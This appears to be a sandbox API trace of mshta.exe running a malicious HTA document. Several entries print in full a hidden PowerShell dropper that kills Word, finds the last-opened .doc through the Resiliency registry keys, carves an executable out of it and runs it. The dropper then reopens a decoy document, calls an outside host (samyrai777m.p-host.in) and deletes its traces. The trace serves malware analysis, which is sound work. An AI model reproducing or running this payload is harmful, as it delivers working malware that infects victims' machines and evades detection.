[0067.298] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.298] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.298] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.298] GetCurrentThreadId () returned 0xbc4
[0067.298] GetCurrentThreadId () returned 0xbc4
[0067.299] IsWindow (hWnd=0x101fa) returned 1
[0067.299] IsWindowVisible (hWnd=0x101fa) returned 0
[0067.300] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe1c0000
[0067.300] GetProcAddress (hModule=0x7fefe1c0000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefe1da4c4
[0067.300] CLSIDFromProgIDEx (in: lpszProgID="WsCriPt.SHeLl", lpclsid=0x2ae3e0 | out: lpclsid=0x2ae3e0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0067.302] SysStringLen (param_1=0x0) returned 0x0
[0067.303] GetProcAddress (hModule=0x7fefe1c0000, lpProcName="CoGetClassObject") returned 0x7fefe1f2e18
[0067.303] CoGetClassObject (in: rclsid=0x2ae3e0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee048e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ae3b0 | out: ppv=0x2ae3b0*=0x4887b0) returned 0x0
[0067.397] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ac680 | out: lpSystemTimeAsFileTime=0x2ac680*(dwLowDateTime=0xd81f7cd0, dwHighDateTime=0x1d34cee))
[0067.397] GetCurrentProcessId () returned 0xbc0
[0067.397] GetCurrentThreadId () returned 0xbc4
[0067.397] GetTickCount () returned 0x201a5
[0067.397] QueryPerformanceCounter (in: lpPerformanceCount=0x2ac688 | out: lpPerformanceCount=0x2ac688*=494462895) returned 1
[0067.397] GetVersionExA (in: lpVersionInformation=0x2ac460*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe52b2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe52a0000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x2ac460*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0067.397] GetUserDefaultLCID () returned 0x409
[0067.398] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ae1e0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0067.398] lstrlenA (lpString="\\wscript.exe") returned 12
[0067.398] lstrlenA (lpString="C:\\Windows\\System32\\mshta.exe") returned 29
[0067.398] _strcmpi (_Str1="32\\mshta.exe", _Str2="\\wscript.exe") returned -41
[0067.398] _strcmpi (_Str1="32\\mshta.exe", _Str2="\\cscript.exe") returned -41
[0067.399] LoadRegTypeLib (in: rguid=0x7fee52b2df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x2ae3d0*=0x0 | out: pptlib=0x2ae3d0*=0x421100) returned 0x0
[0067.402] ITypeLib:GetTypeInfoOfGuid (in: This=0x421100, GUID=0x7fee52b2c30*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x2ae418 | out: ppTInfo=0x2ae418*=0x437708) returned 0x0
[0067.403] ITypeInfo:GetRefTypeOfImplType (in: This=0x437708, index=0xffffffff, pRefType=0x2ae408 | out: pRefType=0x2ae408*=0xfffffffe) returned 0x0
[0067.403] ITypeInfo:GetRefTypeInfo (in: This=0x437708, hreftype=0xfffffffe, ppTInfo=0x7fee52bc128 | out: ppTInfo=0x7fee52bc128*=0x437760) returned 0x0
[0067.403] IUnknown:Release (This=0x437708) returned 0x1
[0067.403] IUnknown:Release (This=0x421100) returned 0x1
[0067.403] IUnknown:AddRef (This=0x437760) returned 0x2
[0067.403] ITypeInfo:LocalGetIDsOfNames (This=0x437760) returned 0x0
[0067.403] IUnknown:Release (This=0x437760) returned 0x1
[0067.403] IUnknown:AddRef (This=0x437760) returned 0x2
[0067.403] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0067.403] ITypeInfo:LocalInvoke (This=0x437760) returned 0x0
[0067.403] ExpandEnvironmentStringsW (in: lpSrc="%sYStemROOt%", lpDst=0x2acda0, nSize=0x400 | out: lpDst="C:\\Windows") returned 0xb
[0067.403] IUnknown:Release (This=0x437760) returned 0x1
[0067.403] GetCurrentThreadId () returned 0xbc4
[0067.403] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.403] GetCurrentThreadId () returned 0xbc4
[0067.403] GetCurrentThreadId () returned 0xbc4
[0067.403] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.403] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.403] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.403] IsCharSpaceW (wch=0x77) returned 0
[0067.403] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.403] IsCharSpaceW (wch=0x77) returned 0
[0067.407] IUnknown:AddRef (This=0x437760) returned 0x2
[0067.407] ITypeInfo:LocalGetIDsOfNames (This=0x437760) returned 0x0
[0067.407] IUnknown:Release (This=0x437760) returned 0x1
[0067.407] IUnknown:AddRef (This=0x437760) returned 0x2
[0067.408] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0067.408] ITypeInfo:LocalInvoke (This=0x437760) returned 0x0
[0067.408] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDst=0x2acd10, nSize=0x400 | out: lpDst="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -i") returned 0x496
[0067.408] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDst=0x4646b8, nSize=0x496 | out: lpDst="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}") returned 0x496
[0067.408] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x7fefe850000
[0067.408] GetProcAddress (hModule=0x7fefe850000, lpProcName="ShellExecuteExW") returned 0x7fefe877c70
[0067.408] ShellExecuteExW (in: pExecInfo=0x2ad4c0*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe", lpParameters="-WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2ad4c0*(cbSize=0x70, fMask=0x440, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe", lpParameters="-WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x4c0)) returned 1
[0067.510] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0067.510] SetTimer (hWnd=0x10206, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0067.510] GetCurrentThreadId () returned 0xbc4
[0067.613] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0067.613] KillTimer (hWnd=0x10206, uIDEvent=0x1008) returned 1
[0067.613] GetCurrentThreadId () returned 0xbc4
[0067.675] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2ad540*=0x4c0, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0076.660] PeekMessageA (in: lpMsg=0x2ad500, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2ad500) returned 1
[0076.664] TranslateMessage (lpMsg=0x2ad500) returned 0
[0076.664] DispatchMessageA (lpMsg=0x2ad500) returned 0x0
[0076.664] PeekMessageA (in: lpMsg=0x2ad500, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2ad500) returned 1
[0076.664] TranslateMessage (lpMsg=0x2ad500) returned 0
[0076.664] DispatchMessageA (lpMsg=0x2ad500)
[0076.664] PeekMessageA (in: lpMsg=0x2ad500, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2ad500) returned 0
[0076.664] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2ad540*=0x4c0, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0076.666] PeekMessageA (in: lpMsg=0x2ad500, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2ad500) returned 1
[0076.666] TranslateMessage (lpMsg=0x2ad500) returned 0
[0076.666] DispatchMessageA (lpMsg=0x2ad500) returned 0x0
[0076.666] PeekMessageA (in: lpMsg=0x2ad500, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2ad500) returned 1
[0076.666] TranslateMessage (lpMsg=0x2ad500) returned 0
[0076.666] DispatchMessageA (lpMsg=0x2ad500)
[0076.666] PeekMessageA (in: lpMsg=0x2ad500, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2ad500) returned 0
[0076.666] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2ad540*=0x4c0, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
[0088.002] GetExitCodeProcess (in: hProcess=0x4c0, lpExitCode=0x2ad570 | out: lpExitCode=0x2ad570*=0xffffffff) returned 1
[0088.002] CloseHandle (hObject=0x4c0) returned 1
[0088.002] IUnknown:Release (This=0x437760) returned 0x1
[0088.003] _wcsicmp (_String1="window", _String2="window") returned 0
[0088.003] GetCurrentThreadId () returned 0xbc4
[0088.003] GetCurrentThreadId () returned 0xbc4
[0088.003] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0088.003] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0088.003] _wcsicmp (_String1="window", _String2="window") returned 0
[0088.003] GetCurrentThreadId () returned 0xbc4
[0088.003] GetCurrentThreadId () returned 0xbc4
[0088.003] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0088.003] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0088.004] GetSystemDefaultLCID () returned 0x409
[0088.004] GetVersionExW (in: lpVersionInformation=0x2aed70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x3, dwBuildNumber=0x1d8, dwPlatformId=0x2af060, szCSDVersion="") | out: lpVersionInformation=0x2aed70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0088.004] GetKeyboardLayoutList (in: nBuff=32, lpList=0x2aec70 | out: lpList=0x2aec70) returned 1
[0088.004] GetSystemMetrics (nIndex=4096) returned 0
[0088.004] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0ca
[0088.004] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0af
[0088.004] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b2
[0088.004] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c5
[0088.004] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c6
[0088.004] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c4
[0088.005] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc077
[0088.005] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0ce
[0088.005] IUnknown:Release (This=0x3c4cd0) returned 0x3
[0088.005] IUnknown:Release (This=0x3aee60) returned 0x10
[0088.010] IUnknown:Release (This=0x3aee60) returned 0xf
[0088.010] IUnknown:Release (This=0x3c4cd0) returned 0x2
[0088.010] IUnknown:Release (This=0x3aee60) returned 0xe
[0088.010] IUnknown:Release (This=0x3aee60) returned 0xd
[0088.010] IUnknown:Release (This=0x3aee60) returned 0xc
[0088.010] IUnknown:Release (This=0x3aee60) returned 0xb
[0088.011] IUnknown:Release (This=0x3f1080) returned 0x1
[0088.011] IUnknown:Release (This=0x3f1080) returned 0x0
[0088.011] IUnknown:Release (This=0x3aee60) returned 0x8
[0088.011] IUnknown:Release (This=0x3aee60) returned 0x7
[0088.011] IUnknown:Release (This=0x3aee60) returned 0x6
[0088.012] EnumFontsW (hdc=0x120108ca, lpLogfont="Times New Roman", lpProc=0x7fee08ee8b0, lParam=0x2ada50) returned 1
[0088.013] SelectObject (hdc=0x120108ca, h=0x18a002e) returned 0x6f0a0962
[0088.013] SelectObject (hdc=0x120108ca, h=0x6f0a0962) returned 0x18a002e
[0088.013] GetTextFaceW (in: hdc=0x120108ca, c=32, lpName=0x2adae0 | out: lpName="Times New Roman") returned 16
[0088.013] SelectObject (hdc=0x120108ca, h=0x18a002e) returned 0x6f0a0962
[0088.013] SelectObject (hdc=0x120108ca, h=0x6f0a0962) returned 0x18a002e
[0088.013] GetTextCharsetInfo (in: hdc=0x120108ca, lpSig=0x2ada00, dwFlags=0x0 | out: lpSig=0x2ada00) returned 0
[0088.013] SelectObject (hdc=0x120108ca, h=0x18a002e) returned 0x6f0a0962
[0088.013] GetFontUnicodeRanges (in: hdc=0x120108ca, lpgs=0x0 | out: lpgs=0x0) returned 0x27c
[0088.013] GetFontUnicodeRanges (in: hdc=0x120108ca, lpgs=0x4695e0 | out: lpgs=0x4695e0) returned 0x27c
[0088.013] SelectObject (hdc=0x120108ca, h=0x18a002e) returned 0x6f0a0962
[0088.013] GetCharWidth32W (in: hdc=0x120108ca, iFirst=0x20, iLast=0x7e, lpBuffer=0x2ada90 | out: lpBuffer=0x2ada90) returned 1
[0088.016] IntersectRect (in: lprcDst=0x2aec30, lprcSrc1=0x2aec30, lprcSrc2=0x2aec00 | out: lprcDst=0x2aec30) returned 1
[0088.016] IntersectRect (in: lprcDst=0x417300, lprcSrc1=0x417300, lprcSrc2=0x2aec20 | out: lprcDst=0x417300) returned 1
[0088.016] UnionRect (in: lprcDst=0x2af270, lprcSrc1=0x2af270, lprcSrc2=0x2af200 | out: lprcDst=0x2af270) returned 1
[0088.017] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x2af350 | out: ppu=0x2af350) returned 0x0
[0088.017] IUnknown:AddRef (This=0x3aee60) returned 0x7
[0088.017] IUri:GetAbsoluteUri (in: This=0x3aee60, pbstrAbsoluteUri=0x2af438 | out: pbstrAbsoluteUri=0x2af438*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0088.017] IUnknown:Release (This=0x3aee60) returned 0x6
[0088.017] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x7fefde70000
[0088.017] GetProcAddress (hModule=0x7fefde70000, lpProcName="VariantClear") returned 0x7fefde71180
[0088.017] ShouldShowIntranetWarningSecband () returned 0x0
[0088.018] GetIUriPriv () returned 0x0
[0088.018] IUnknown:Release (This=0x3aee60) returned 0x6
[0088.018] GetCursorPos (in: lpPoint=0x2af0f0 | out: lpPoint=0x2af0f0*(x=791, y=286)) returned 1
[0088.018] ScreenToClient (in: hWnd=0x10206, lpPoint=0x2af0f0 | out: lpPoint=0x2af0f0) returned 1
[0088.018] GetKeyState (nVirtKey=16) returned 0
[0088.018] GetKeyState (nVirtKey=17) returned 0
[0088.018] GetKeyState (nVirtKey=18) returned 0
[0088.018] GetKeyState (nVirtKey=160) returned 0
[0088.018] GetKeyState (nVirtKey=162) returned 0
[0088.018] GetKeyState (nVirtKey=164) returned 0
[0088.018] IUnknown:AddRef (This=0x3aee60) returned 0x7
[0088.018] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x2ae388 | out: pdwScheme=0x2ae388*=0x2) returned 0x0
[0088.018] IUri:GetDisplayUri (in: This=0x3aee60, pbstrDisplayString=0x2ae3b0 | out: pbstrDisplayString=0x2ae3b0*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0088.018] GetWindowTextW (in: hWnd=0x101fa, lpString=0x2adf00, nMaxCount=512 | out: lpString="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 49
[0088.018] IUnknown:Release (This=0x3aee60) returned 0x6
[0088.018] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0088.018] SendMessageW (hWnd=0x5001c, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0088.019] SendMessageW (hWnd=0x101fa, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0
[0088.019] SetWindowLongW (hWnd=0x101fa, nIndex=-16, dwNewLong=-2100363264) returned -2033254400
[0088.029] SetWindowLongW (hWnd=0x101fa, nIndex=-20, dwNewLong=262144) returned 262400
[0088.029] SetWindowPos (hWnd=0x101fa, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0088.030] GlobalAddAtomW (lpString=0x0) returned 0x0
[0088.030] SetPropW (hWnd=0x5001c, lpString=0x0, hData=0x5001c) returned 0
[0088.030] SetWindowPos (hWnd=0x101fa, hWndInsertAfter=0x0, X=-2000, Y=-2000, cx=0, cy=0, uFlags=0x15) returned 1
[0088.030] SetWindowPos (hWnd=0x101fa, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x16)
[0088.031] GetClientRect (in: hWnd=0x101fa, lpRect=0x2ae770 | out: lpRect=0x2ae770) returned 1
[0088.031] GetClientRect (in: hWnd=0x101fa, lpRect=0x2ae7a0 | out: lpRect=0x2ae7a0) returned 1
[0088.031] GetUpdateRgn (hWnd=0x10206, hRgn=0x2004026d, bErase=0) returned 1
[0088.031] DeleteObject (ho=0x2004026d) returned 1
[0088.031] SetWindowPos (hWnd=0x10206, hWndInsertAfter=0x0, X=0, Y=0, cx=116, cy=0, uFlags=0x14) returned 1
[0088.031] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0088.031] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x46, wParam=0x0, lParam=0x2ae610*=66054, plResult=0x2ae400 | out: plResult=0x2ae400) returned 0x1
[0088.031] NtdllDefWindowProc_W () returned 0x0
[0088.031] GetCurrentThreadId () returned 0xbc4
[0088.032] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0088.032] GetCurrentThreadId () returned 0xbc4
[0088.032] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0088.032] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x47, wParam=0x0, lParam=0x2ae610*=66054, plResult=0x2ae400 | out: plResult=0x2ae400) returned 0x1
[0088.032] NtdllDefWindowProc_W () returned 0x0
[0088.032] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0088.032] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x5, wParam=0x0, lParam=0x74, plResult=0x2add50 | out: plResult=0x2add50) returned 0x1
[0088.032] NtdllDefWindowProc_W () returned 0x0
[0088.032] GetCurrentThreadId () returned 0xbc4
[0088.032] GetCurrentThreadId () returned 0xbc4
[0088.032] GetCurrentThreadId () returned 0xbc4
[0088.034] GetFocus () returned 0x0
[0088.034] SetFocus (hWnd=0x10206)
